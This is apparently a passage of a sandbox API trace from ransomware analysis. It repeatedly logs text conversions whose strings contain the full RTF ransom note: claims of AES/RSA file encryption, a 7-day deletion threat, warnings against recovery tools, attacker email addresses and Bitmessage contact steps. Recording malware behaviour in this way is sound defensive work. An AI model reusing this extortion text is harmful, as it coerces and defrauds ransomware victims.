middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.689] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0289.689] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x235fca8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd 